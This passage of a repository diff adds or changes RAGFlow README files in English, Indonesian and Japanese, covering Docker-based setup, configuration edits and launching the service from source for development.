+ > With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number), as the default
217
+ > HTTP serving port `80` can be omitted.
218
+ 6. In [service_conf.yaml.template](./docker/service_conf.yaml.template), select the desired LLM factory in `user_default_llm` and update
219
+ the `API_KEY` field with the corresponding API key.
220
+
221
+ > See [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) for more information.
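+ >
+ > If RAGFlow is already up and running when you edit this file, restart the containers so the change takes effect (see [Configurations](#-configurations) below):
+ >
+ > ```bash
+ > $ docker compose -f docker/docker-compose.yml up -d
+ > ```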
222
+
223
+ _The show is on!_
224
+
225
+ ## 🔧 Configurations
226
+
227
+ When it comes to system configurations, you will need to manage the following files:
228
+
229
+ - [.env](./docker/.env): Keeps the fundamental setups for the system, such as `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, and
230
+ `MINIO_PASSWORD`.
231
+ - [service_conf.yaml.template](./docker/service_conf.yaml.template): Configures the back-end services. The environment variables in this file will be automatically populated when the Docker container starts. Any environment variables set within the Docker container will be available for use, allowing you to customize service behavior based on the deployment environment.
232
+ - [docker-compose.yml](./docker/docker-compose.yml): The system relies on [docker-compose.yml](./docker/docker-compose.yml) to start up.
233
+
234
+ > The [./docker/README](./docker/README.md) file provides a detailed description of the environment settings and service
235
+ > configurations which can be used as `${ENV_VARS}` in the [service_conf.yaml.template](./docker/service_conf.yaml.template) file.
236
+
237
+ To update the default HTTP serving port (80), go to [docker-compose.yml](./docker/docker-compose.yml) and change `80:80`
238
+ to `<YOUR_SERVING_PORT>:80`.
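+
+ For example, to serve RAGFlow on port `8080` instead, an illustrative one-liner (assuming `80:80` appears only in the RAGFlow port mapping; editing the file manually is equally fine) is:
+
+ ```bash
+ sed -i 's/80:80/8080:80/' docker/docker-compose.yml
+ ```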
239
+
240
+ Updates to the above configurations require a reboot of all containers to take effect:
241
+
242
+ > ```bash
243
+ > $ docker compose -f docker/docker-compose.yml up -d
244
+ > ```
245
+
246
+ ### Switch doc engine from Elasticsearch to Infinity
247
+
248
+ RAGFlow uses Elasticsearch by default for storing full text and vectors. To switch to [Infinity](https://github.com/infiniflow/infinity/), follow these steps:
249
+
250
+ 1. Stop all running containers:
251
+
252
+ ```bash
253
+ $ docker compose -f docker/docker-compose.yml down -v
254
+ ```
255
+
256
+ 2. Set `DOC_ENGINE` in **docker/.env** to `infinity`.
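+
+ For example (an illustrative one-liner that assumes `DOC_ENGINE` is set on a single uncommented line; editing the file by hand works just as well):
+
+ ```bash
+ sed -i 's/^DOC_ENGINE=.*/DOC_ENGINE=infinity/' docker/.env
+ ```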
257
+
258
+ 3. Start the containers:
259
+
260
+ ```bash
261
+ $ docker compose -f docker/docker-compose.yml up -d
262
+ ```
263
+
264
+ > [!WARNING]
265
+ > Switching to Infinity on a Linux/arm64 machine is not yet officially supported.
266
+
267
+ ## 🔧 Build a Docker image without embedding models
268
+
269
+ This image is approximately 2 GB in size and relies on external LLM and embedding services.
270
+
271
+ ```bash
272
+ git clone https://github.com/infiniflow/ragflow.git
273
+ cd ragflow/
274
+ docker build --build-arg LIGHTEN=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
275
+ ```
276
+
277
+ ## 🔧 Build a Docker image including embedding models
278
+
279
+ This image is approximately 9 GB in size. As it includes embedding models, it relies on external LLM services only.
280
+
281
+ ```bash
282
+ git clone https://github.com/infiniflow/ragflow.git
283
+ cd ragflow/
284
+ docker build -f Dockerfile -t infiniflow/ragflow:nightly .
285
+ ```
286
+
287
+ ## 🔨 Launch service from source for development
288
+
289
+ 1. Install uv, or skip this step if it is already installed:
290
+
291
+ ```bash
292
+ pipx install uv
293
+ ```
294
+
295
+ 2. Clone the source code and install Python dependencies:
296
+
297
+ ```bash
298
+ git clone https://github.com/infiniflow/ragflow.git
299
+ cd ragflow/
300
+ uv sync --python 3.10 --all-extras # install RAGFlow dependent python modules
301
+ ```
302
+
303
+ 3. Launch the dependent services (MinIO, Elasticsearch, Redis, and MySQL) using Docker Compose:
304
+
305
+ ```bash
306
+ docker compose -f docker/docker-compose-base.yml up -d
307
+ ```
308
+
309
+ Add the following line to `/etc/hosts` to resolve all hosts specified in **docker/.env** to `127.0.0.1`:
310
+
311
+ ```
312
+ 127.0.0.1 es01 infinity mysql minio redis
313
+ ```
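+
+ Optionally, confirm that the dependent services are running before continuing:
+
+ ```bash
+ docker compose -f docker/docker-compose-base.yml ps
+ ```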
314
+
315
+ 4. If you cannot access HuggingFace, set the `HF_ENDPOINT` environment variable to use a mirror site:
316
+
317
+ ```bash
318
+ export HF_ENDPOINT=https://hf-mirror.com
319
+ ```
320
+
321
+ 5. Launch backend service:
322
+
323
+ ```bash
324
+ source .venv/bin/activate
325
+ export PYTHONPATH=$(pwd)
326
+ bash docker/launch_backend_service.sh
327
+ ```
328
+
329
+ 6. Install frontend dependencies:
330
+ ```bash
331
+ cd web
332
+ npm install
333
+ ```
334
+ 7. Launch frontend service:
335
+
336
+ ```bash
337
+ npm run dev
338
+ ```
339
+
340
+ _The following output confirms a successful launch of the system:_
341
+
342
+ ![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)
343
+
344
+ ## 📚 Documentation
345
+
346
+ - [Quickstart](https://ragflow.io/docs/dev/)
347
+ - [User guide](https://ragflow.io/docs/dev/category/guides)
348
+ - [References](https://ragflow.io/docs/dev/category/references)
349
+ - [FAQ](https://ragflow.io/docs/dev/faq)
350
+
351
+ ## 📜 Roadmap
352
+
353
+ See the [RAGFlow Roadmap 2025](https://github.com/infiniflow/ragflow/issues/4214).
354
+
355
+ ## 🏄 Community
356
+
357
+ - [Discord](https://discord.gg/4XxujFgUN7)
358
+ - [Twitter](https://twitter.com/infiniflowai)
359
+ - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
360
+
361
+ ## 🙌 Contributing
362
+
363
+ RAGFlow flourishes via open-source collaboration. In this spirit, we embrace diverse contributions from the community.
364
+ If you would like to be a part, review our [Contribution Guidelines](./CONTRIBUTING.md) first.
ragflow-main/README_id.md ADDED
@@ -0,0 +1,333 @@
1
+ <div align="center">
2
+ <a href="https://demo.ragflow.io/">
3
+ <img src="web/src/assets/logo-with-text.png" width="520" alt="Logo ragflow">
4
+ </a>
5
+ </div>
6
+
7
+ <p align="center">
8
+ <a href="./README.md">English</a> |
9
+ <a href="./README_zh.md">简体中文</a> |
10
+ <a href="./README_tzh.md">繁体中文</a> |
11
+ <a href="./README_ja.md">日本語</a> |
12
+ <a href="./README_ko.md">한국어</a> |
13
+ <a href="./README_id.md">Bahasa Indonesia</a> |
14
+ <a href="/README_pt_br.md">Português (Brasil)</a>
15
+ </p>
16
+
17
+ <p align="center">
18
+ <a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
19
+ <img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="Ikuti di X (Twitter)">
20
+ </a>
21
+ <a href="https://demo.ragflow.io" target="_blank">
22
+ <img alt="Lencana Daring" src="https://img.shields.io/badge/Online-Demo-4e6b99">
23
+ </a>
24
+ <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
25
+ <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.16.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.16.0">
26
+ </a>
27
+ <a href="https://github.com/infiniflow/ragflow/releases/latest">
28
+ <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Rilis%20Terbaru" alt="Rilis Terbaru">
29
+ </a>
30
+ <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
31
+ <img height="21" src="https://img.shields.io/badge/Lisensi-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="Lisensi">
32
+ </a>
33
+ </p>
34
+
35
+ <h4 align="center">
36
+ <a href="https://ragflow.io/docs/dev/">Dokumentasi</a> |
37
+ <a href="https://github.com/infiniflow/ragflow/issues/4214">Peta Jalan</a> |
38
+ <a href="https://twitter.com/infiniflowai">Twitter</a> |
39
+ <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
40
+ <a href="https://demo.ragflow.io">Demo</a>
41
+ </h4>
42
+
43
+ <details open>
44
+ <summary><b>📕 Daftar Isi</b></summary>
45
+
46
+ - 💡 [Apa Itu RAGFlow?](#-apa-itu-ragflow)
47
+ - 🎮 [Demo](#-demo)
48
+ - 📌 [Pembaruan Terbaru](#-pembaruan-terbaru)
49
+ - 🌟 [Fitur Utama](#-fitur-utama)
50
+ - 🔎 [Arsitektur Sistem](#-arsitektur-sistem)
51
+ - 🎬 [Mulai](#-mulai)
52
+ - 🔧 [Konfigurasi](#-konfigurasi)
53
+ - 🔧 [Membangun Image Docker tanpa Model Embedding](#-membangun-image-docker-tanpa-model-embedding)
54
+ - 🔧 [Membangun Image Docker dengan Model Embedding](#-membangun-image-docker-dengan-model-embedding)
55
+ - 🔨 [Meluncurkan aplikasi dari Sumber untuk Pengembangan](#-meluncurkan-aplikasi-dari-sumber-untuk-pengembangan)
56
+ - 📚 [Dokumentasi](#-dokumentasi)
57
+ - 📜 [Peta Jalan](#-peta-jalan)
58
+ - 🏄 [Komunitas](#-komunitas)
59
+ - 🙌 [Kontribusi](#-kontribusi)
60
+
61
+ </details>
62
+
63
+ ## 💡 Apa Itu RAGFlow?
64
+
65
+ [RAGFlow](https://ragflow.io/) adalah mesin RAG (Retrieval-Augmented Generation) open-source berbasis pemahaman dokumen yang mendalam. Platform ini menyediakan alur kerja RAG yang efisien untuk bisnis dengan berbagai skala, menggabungkan LLM (Large Language Models) untuk menyediakan kemampuan tanya-jawab yang benar dan didukung oleh referensi dari data terstruktur kompleks.
66
+
67
+ ## 🎮 Demo
68
+
69
+ Coba demo kami di [https://demo.ragflow.io](https://demo.ragflow.io).
70
+
71
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
72
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
73
+ <img src="https://github.com/user-attachments/assets/504bbbf1-c9f7-4d83-8cc5-e9cb63c26db6" width="1200"/>
74
+ </div>
75
+
76
+ ## 🔥 Pembaruan Terbaru
77
+
78
+ - 2025-02-05 Memperbarui daftar model 'SILICONFLOW' dan menambahkan dukungan untuk Deepseek-R1/DeepSeek-V3.
79
+ - 2025-01-26 Optimalkan ekstraksi dan penerapan grafik pengetahuan dan sediakan berbagai opsi konfigurasi.
80
+ - 2024-12-18 Meningkatkan model Analisis Tata Letak Dokumen di Deepdoc.
81
+ - 2024-12-04 Mendukung skor pagerank ke basis pengetahuan.
82
+ - 2024-11-22 Peningkatan definisi dan penggunaan variabel di Agen.
83
+ - 2024-11-01 Penambahan ekstraksi kata kunci dan pembuatan pertanyaan terkait untuk meningkatkan akurasi pengambilan.
84
+ - 2024-08-22 Dukungan untuk teks ke pernyataan SQL melalui RAG.
85
+
86
+ ## 🎉 Tetap Terkini
87
+
88
+ ⭐️ Star repositori kami untuk tetap mendapat informasi tentang fitur baru dan peningkatan menarik! 🌟
89
+
90
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
91
+ <img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
92
+ </div>
93
+
94
+ ## 🌟 Fitur Utama
95
+
96
+ ### 🍭 **"Kualitas Masuk, Kualitas Keluar"**
97
+
98
+ - Ekstraksi pengetahuan berbasis pemahaman dokumen mendalam dari data tidak terstruktur dengan format yang rumit.
99
+ - Menemukan "jarum di tumpukan data" dengan token yang hampir tidak terbatas.
100
+
101
+ ### 🍱 **Pemotongan Berbasis Template**
102
+
103
+ - Cerdas dan dapat dijelaskan.
104
+ - Banyak pilihan template yang tersedia.
105
+
106
+ ### 🌱 **Referensi yang Didasarkan pada Data untuk Mengurangi Halusinasi**
107
+
108
+ - Visualisasi pemotongan teks memungkinkan intervensi manusia.
109
+ - Tampilan cepat referensi kunci dan referensi yang dapat dilacak untuk mendukung jawaban yang didasarkan pada fakta.
110
+
111
+ ### 🍔 **Kompatibilitas dengan Sumber Data Heterogen**
112
+
113
+ - Mendukung Word, slide, excel, txt, gambar, salinan hasil scan, data terstruktur, halaman web, dan banyak lagi.
114
+
115
+ ### 🛀 **Alur Kerja RAG yang Otomatis dan Mudah**
116
+
117
+ - Orkestrasi RAG yang ramping untuk bisnis kecil dan besar.
118
+ - LLM yang dapat dikonfigurasi serta model embedding.
119
+ - Peringkat ulang berpasangan dengan beberapa pengambilan ulang.
120
+ - API intuitif untuk integrasi yang mudah dengan bisnis.
121
+
122
+ ## 🔎 Arsitektur Sistem
123
+
124
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
125
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
126
+ </div>
127
+
128
+ ## 🎬 Mulai
129
+
130
+ ### 📝 Prasyarat
131
+
132
+ - CPU >= 4 inti
133
+ - RAM >= 16 GB
134
+ - Disk >= 50 GB
135
+ - Docker >= 24.0.0 & Docker Compose >= v2.26.1
136
+
137
+ ### 🚀 Menjalankan Server
138
+
139
+ 1. Pastikan `vm.max_map_count` >= 262144:
140
+
141
+ > Untuk memeriksa nilai `vm.max_map_count`:
142
+ >
143
+ > ```bash
144
+ > $ sysctl vm.max_map_count
145
+ > ```
146
+ >
147
+ > Jika nilainya kurang dari 262144, setel ulang `vm.max_map_count` ke setidaknya 262144:
148
+ >
149
+ > ```bash
150
+ > # Dalam contoh ini, kita atur menjadi 262144:
151
+ > $ sudo sysctl -w vm.max_map_count=262144
152
+ > ```
153
+ >
154
+ > Perubahan ini akan hilang setelah sistem direboot. Untuk membuat perubahan ini permanen, tambahkan atau perbarui nilai
155
+ > `vm.max_map_count` di **/etc/sysctl.conf**:
156
+ >
157
+ > ```bash
158
+ > vm.max_map_count=262144
159
+ > ```
160
+
161
+ 2. Clone repositori:
162
+
163
+ ```bash
164
+ $ git clone https://github.com/infiniflow/ragflow.git
165
+ ```
166
+
167
+ 3. Jalankan server menggunakan image Docker pre-built:
168
+
169
+ > Perintah di bawah ini mengunduh edisi v0.16.0-slim dari gambar Docker RAGFlow. Silakan merujuk ke tabel berikut untuk deskripsi berbagai edisi RAGFlow. Untuk mengunduh edisi RAGFlow yang berbeda dari v0.16.0-slim, perbarui variabel RAGFLOW_IMAGE di docker/.env sebelum menggunakan docker compose untuk memulai server. Misalnya, atur RAGFLOW_IMAGE=infiniflow/ragflow:v0.16.0 untuk edisi lengkap v0.16.0.
170
+
171
+ ```bash
172
+ $ cd ragflow
173
+ $ docker compose -f docker/docker-compose.yml up -d
174
+ ```
175
+
176
+ | RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
177
+ | ----------------- | --------------- | --------------------- | ------------------------ |
178
+ | v0.16.0 | &approx;9 | :heavy_check_mark: | Stable release |
179
+ | v0.16.0-slim | &approx;2 | ❌ | Stable release |
180
+ | nightly | &approx;9 | :heavy_check_mark: | _Unstable_ nightly build |
181
+ | nightly-slim | &approx;2 | ❌ | _Unstable_ nightly build |
182
+
183
+ 4. Periksa status server setelah server aktif dan berjalan:
184
+
185
+ ```bash
186
+ $ docker logs -f ragflow-server
187
+ ```
188
+
189
+ _Output berikut menandakan bahwa sistem berhasil diluncurkan:_
190
+
191
+ ```bash
192
+
193
+ ____ ___ ______ ______ __
194
+ / __ \ / | / ____// ____// /____ _ __
195
+ / /_/ // /| | / / __ / /_ / // __ \| | /| / /
196
+ / _, _// ___ |/ /_/ // __/ / // /_/ /| |/ |/ /
197
+ /_/ |_|/_/ |_|\____//_/ /_/ \____/ |__/|__/
198
+
199
+ * Running on all addresses (0.0.0.0)
200
+ * Running on http://127.0.0.1:9380
201
+ * Running on http://x.x.x.x:9380
202
+ INFO:werkzeug:Press CTRL+C to quit
203
+ ```
204
+
205
+ > Jika Anda melewatkan langkah ini dan langsung login ke RAGFlow, browser Anda mungkin menampilkan error `network anormal`
206
+ > karena RAGFlow mungkin belum sepenuhnya siap.
207
+
208
+ 5. Buka browser web Anda, masukkan alamat IP server Anda, dan login ke RAGFlow.
209
+ > Dengan pengaturan default, Anda hanya perlu memasukkan `http://IP_DEVICE_ANDA` (**tanpa** nomor port) karena
210
+ > port HTTP default `80` bisa dihilangkan saat menggunakan konfigurasi default.
211
+ 6. Dalam [service_conf.yaml.template](./docker/service_conf.yaml.template), pilih LLM factory yang diinginkan di `user_default_llm` dan perbarui
212
+ bidang `API_KEY` dengan kunci API yang sesuai.
213
+
214
+ > Lihat [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) untuk informasi lebih lanjut.
215
+
216
+ _Sistem telah siap digunakan!_
217
+
218
+ ## 🔧 Konfigurasi
219
+
220
+ Untuk konfigurasi sistem, Anda perlu mengelola file-file berikut:
221
+
222
+ - [.env](./docker/.env): Menyimpan pengaturan dasar sistem, seperti `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, dan
223
+ `MINIO_PASSWORD`.
224
+ - [service_conf.yaml.template](./docker/service_conf.yaml.template): Mengonfigurasi aplikasi backend.
225
+ - [docker-compose.yml](./docker/docker-compose.yml): Sistem ini bergantung pada [docker-compose.yml](./docker/docker-compose.yml) untuk memulai.
226
+
227
+ Untuk memperbarui port HTTP default (80), buka [docker-compose.yml](./docker/docker-compose.yml) dan ubah `80:80`
228
+ menjadi `<YOUR_SERVING_PORT>:80`.
229
+
230
+ Pembaruan konfigurasi ini memerlukan reboot semua kontainer agar efektif:
231
+
232
+ > ```bash
233
+ > $ docker compose -f docker/docker-compose.yml up -d
234
+ > ```
235
+
236
+ ## 🔧 Membangun Image Docker tanpa Model Embedding
237
+
238
+ Image ini berukuran sekitar 2 GB dan bergantung pada aplikasi LLM eksternal dan embedding.
239
+
240
+ ```bash
241
+ git clone https://github.com/infiniflow/ragflow.git
242
+ cd ragflow/
243
+ docker build --build-arg LIGHTEN=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
244
+ ```
245
+
246
+ ## 🔧 Membangun Image Docker dengan Model Embedding
247
+
248
+ Image ini berukuran sekitar 9 GB. Karena sudah termasuk model embedding, ia hanya bergantung pada aplikasi LLM eksternal.
249
+
250
+ ```bash
251
+ git clone https://github.com/infiniflow/ragflow.git
252
+ cd ragflow/
253
+ docker build -f Dockerfile -t infiniflow/ragflow:nightly .
254
+ ```
255
+
256
+ ## 🔨 Meluncurkan Aplikasi dari Sumber untuk Pengembangan
257
+
258
+ 1. Instal uv, atau lewati langkah ini jika sudah terinstal:
259
+
260
+ ```bash
261
+ pipx install uv
262
+ ```
263
+
264
+ 2. Clone kode sumber dan instal dependensi Python:
265
+
266
+ ```bash
267
+ git clone https://github.com/infiniflow/ragflow.git
268
+ cd ragflow/
269
+ uv sync --python 3.10 --all-extras # install RAGFlow dependent python modules
270
+ ```
271
+
272
+ 3. Jalankan aplikasi yang diperlukan (MinIO, Elasticsearch, Redis, dan MySQL) menggunakan Docker Compose:
273
+
274
+ ```bash
275
+ docker compose -f docker/docker-compose-base.yml up -d
276
+ ```
277
+
278
+ Tambahkan baris berikut ke `/etc/hosts` untuk memetakan semua host yang ditentukan di **conf/service_conf.yaml** ke `127.0.0.1`:
279
+
280
+ ```
281
+ 127.0.0.1 es01 infinity mysql minio redis
282
+ ```
283
+
284
+ 4. Jika Anda tidak dapat mengakses HuggingFace, atur variabel lingkungan `HF_ENDPOINT` untuk menggunakan situs mirror:
285
+
286
+ ```bash
287
+ export HF_ENDPOINT=https://hf-mirror.com
288
+ ```
289
+
290
+ 5. Jalankan aplikasi backend:
291
+
292
+ ```bash
293
+ source .venv/bin/activate
294
+ export PYTHONPATH=$(pwd)
295
+ bash docker/launch_backend_service.sh
296
+ ```
297
+
298
+ 6. Instal dependensi frontend:
299
+ ```bash
300
+ cd web
301
+ npm install
302
+ ```
303
+ 7. Jalankan aplikasi frontend:
304
+
305
+ ```bash
306
+ npm run dev
307
+ ```
308
+
309
+ _Output berikut menandakan bahwa sistem berhasil diluncurkan:_
310
+
311
+ ![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)
312
+
313
+ ## 📚 Dokumentasi
314
+
315
+ - [Quickstart](https://ragflow.io/docs/dev/)
316
+ - [Panduan Pengguna](https://ragflow.io/docs/dev/category/guides)
317
+ - [Referensi](https://ragflow.io/docs/dev/category/references)
318
+ - [FAQ](https://ragflow.io/docs/dev/faq)
319
+
320
+ ## 📜 Peta Jalan
321
+
322
+ Lihat [Roadmap RAGFlow 2025](https://github.com/infiniflow/ragflow/issues/4214)
323
+
324
+ ## 🏄 Komunitas
325
+
326
+ - [Discord](https://discord.gg/4XxujFgUN7)
327
+ - [Twitter](https://twitter.com/infiniflowai)
328
+ - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
329
+
330
+ ## 🙌 Kontribusi
331
+
332
+ RAGFlow berkembang melalui kolaborasi open-source. Dalam semangat ini, kami menerima kontribusi dari komunitas.
333
+ Jika Anda ingin berpartisipasi, tinjau terlebih dahulu [Panduan Kontribusi](./CONTRIBUTING.md).
ragflow-main/README_ja.md ADDED
@@ -0,0 +1,327 @@
1
+ <div align="center">
2
+ <a href="https://demo.ragflow.io/">
3
+ <img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
4
+ </a>
5
+ </div>
6
+
7
+ <p align="center">
8
+ <a href="./README.md">English</a> |
9
+ <a href="./README_zh.md">简体中文</a> |
10
+ <a href="./README_tzh.md">繁体中文</a> |
11
+ <a href="./README_ja.md">日本語</a> |
12
+ <a href="./README_ko.md">한국어</a> |
13
+ <a href="./README_id.md">Bahasa Indonesia</a> |
14
+ <a href="/README_pt_br.md">Português (Brasil)</a>
15
+ </p>
16
+
17
+ <p align="center">
18
+ <a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
19
+ <img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="follow on X(Twitter)">
20
+ </a>
21
+ <a href="https://demo.ragflow.io" target="_blank">
22
+ <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99">
23
+ </a>
24
+ <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
25
+ <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.16.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.16.0">
26
+ </a>
27
+ <a href="https://github.com/infiniflow/ragflow/releases/latest">
28
+ <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
29
+ </a>
30
+ <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
31
+ <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
32
+ </a>
33
+ </p>
34
+
35
+ <h4 align="center">
36
+ <a href="https://ragflow.io/docs/dev/">Document</a> |
37
+ <a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
38
+ <a href="https://twitter.com/infiniflowai">Twitter</a> |
39
+ <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
40
+ <a href="https://demo.ragflow.io">Demo</a>
41
+ </h4>
42
+
43
+ ## 💡 RAGFlow とは?
44
+
45
+ [RAGFlow](https://ragflow.io/) は、深い文書理解に基づいたオープンソースの RAG (Retrieval-Augmented Generation) エンジンである。LLM(大規模言語モデル)を組み合わせることで、様々な複雑なフォーマットのデータから根拠のある引用に裏打ちされた、信頼できる質問応答機能を実現し、あらゆる規模のビジネスに適した RAG ワークフローを提供します。
46
+
47
+ ## 🎮 Demo
48
+
49
+ デモをお試しください:[https://demo.ragflow.io](https://demo.ragflow.io)。
50
+
51
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
52
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
53
+ <img src="https://github.com/user-attachments/assets/504bbbf1-c9f7-4d83-8cc5-e9cb63c26db6" width="1200"/>
54
+ </div>
55
+
56
+ ## 🔥 最新情報
57
+
58
+ - 2025-02-05 シリコン フローの St およびモデル リストを更新し、Deep Seek-R1/Deep Seek-V3 のサポートを追加しました。
59
+ - 2025-01-26 ナレッジ グラフの抽出と適用を最適化し、さまざまな構成オプションを提供します。
60
+ - 2024-12-18 Deepdoc のドキュメント レイアウト分析モデルをアップグレードします。
61
+ - 2024-12-04 ナレッジ ベースへのページランク スコアをサポートしました。
62
+ - 2024-11-22 エージェントでの変数の定義と使用法を改善しました。
63
+ - 2024-11-01 再現の精度を向上させるために、解析されたチャンクにキーワード抽出と関連質問の生成を追加しました。
64
+ - 2024-08-22 RAG を介して SQL ステートメントへのテキストをサポートします。
65
+
66
+ ## 🎉 続きを楽しみに
67
+
68
+ ⭐️ リポジトリをスター登録して、エキサイティングな新機能やアップデートを最新の状態に保ちましょう!すべての新しいリリースに関する即時通知を受け取れます! 🌟
69
+
70
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
71
+ <img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
72
+ </div>
73
+
74
+ ## 🌟 主な特徴
75
+
76
+ ### 🍭 **"Quality in, quality out"**
77
+
78
+ - 複雑な形式の非構造化データからの[深い文書理解](./deepdoc/README.md)ベースの知識抽出。
79
+ - 無限のトークンから"干し草の山の中の針"を見つける。
80
+
81
+ ### 🍱 **テンプレートベースのチャンク化**
82
+
83
+ - 知的で解釈しやすい。
84
+ - テンプレートオプションが豊富。
85
+
86
+ ### 🌱 **ハルシネーションが軽減された根拠のある引用**
87
+
88
+ - 可視化されたテキストチャンキング(text chunking)で人間の介入を可能にする。
89
+ - 重要な参考文献のクイックビューと、追跡可能な引用によって根拠ある答えをサポートする。
90
+
91
+ ### 🍔 **多様なデータソースとの互換性**
92
+
93
+ - Word、スライド、Excel、txt、画像、スキャンコピー、構造化データ、Web ページなどをサポート。
94
+
95
+ ### 🛀 **自動化された楽な RAG ワークフロー**
96
+
97
+ - 個人から大企業まで対応できる RAG オーケストレーション(orchestration)。
98
+ - カスタマイズ可能な LLM とエンベッディングモデル。
99
+ - 複数の想起と融合された再ランク付け。
100
+ - 直感的な API によってビジネスとの統合がシームレスに。
101
+
102
+ ## 🔎 システム構成
103
+
104
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
105
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
106
+ </div>
107
+
108
+ ## 🎬 初期設定
109
+
110
+ ### 📝 必要条件
111
+
112
+ - CPU >= 4 cores
113
+ - RAM >= 16 GB
114
+ - Disk >= 50 GB
115
+ - Docker >= 24.0.0 & Docker Compose >= v2.26.1
116
+ > ローカルマシン(Windows、Mac、または Linux)に Docker をインストールしていない場合は、[Docker Engine のインストール](https://docs.docker.com/engine/install/) を参照してください。
117
+
118
+ ### 🚀 サーバーを起動
119
+
120
+ 1. `vm.max_map_count` >= 262144 であることを確認する:
121
+
122
+ > `vm.max_map_count` の値をチェックするには:
123
+ >
124
+ > ```bash
125
+ > $ sysctl vm.max_map_count
126
+ > ```
127
+ >
128
+ > `vm.max_map_count` が 262144 より大きい値でなければリセットする。
129
+ >
130
+ > ```bash
131
+ > # In this case, we set it to 262144:
132
+ > $ sudo sysctl -w vm.max_map_count=262144
133
+ > ```
134
+ >
135
+ > この変更はシステム再起動後にリセットされる。変更を恒久的なものにするには、**/etc/sysctl.conf** の `vm.max_map_count` 値を適宜追加または更新する:
136
+ >
137
+ > ```bash
138
+ > vm.max_map_count=262144
139
+ > ```
140
+
141
+ 2. リポジトリをクローンする:
142
+
143
+ ```bash
144
+ $ git clone https://github.com/infiniflow/ragflow.git
145
+ ```
146
+
147
+ 3. ビルド済みの Docker イメージをビルドし、サーバーを起動する:
148
+
149
+ > 以下のコマンドは、RAGFlow Docker イメージの v0.16.0-slim エディションをダウンロードします。異なる RAGFlow エディションの説明については、以下の表を参照してください。v0.16.0-slim とは異なるエディションをダウンロードするには、docker/.env ファイルの RAGFLOW_IMAGE 変数を適宜更新し、docker compose を使用してサーバーを起動してください。例えば、完全版 v0.16.0 をダウンロードするには、RAGFLOW_IMAGE=infiniflow/ragflow:v0.16.0 と設定します。
150
+
151
+ ```bash
152
+ $ cd ragflow
153
+ $ docker compose -f docker/docker-compose.yml up -d
154
+ ```
155
+
156
+ | RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
157
+ | ----------------- | --------------- | --------------------- | ------------------------ |
158
+ | v0.16.0 | &approx;9 | :heavy_check_mark: | Stable release |
159
+ | v0.16.0-slim | &approx;2 | ❌ | Stable release |
160
+ | nightly | &approx;9 | :heavy_check_mark: | _Unstable_ nightly build |
161
+ | nightly-slim | &approx;2 | ❌ | _Unstable_ nightly build |
162
+
163
+ 4. サーバーを立ち上げた後、サーバーの状態を確認する:
164
+
165
+ ```bash
166
+ $ docker logs -f ragflow-server
167
+ ```
168
+
169
+ _以下の出力は、システムが正常に起動したことを確認するものです:_
170
+
171
+ ```bash
172
+ ____ ___ ______ ______ __
173
+ / __ \ / | / ____// ____// /____ _ __
174
+ / /_/ // /| | / / __ / /_ / // __ \| | /| / /
175
+ / _, _// ___ |/ /_/ // __/ / // /_/ /| |/ |/ /
176
+ /_/ |_|/_/ |_|\____//_/ /_/ \____/ |__/|__/
177
+
178
+ * Running on all addresses (0.0.0.0)
179
+ * Running on http://127.0.0.1:9380
180
+ * Running on http://x.x.x.x:9380
181
+ INFO:werkzeug:Press CTRL+C to quit
182
+ ```
183
+
184
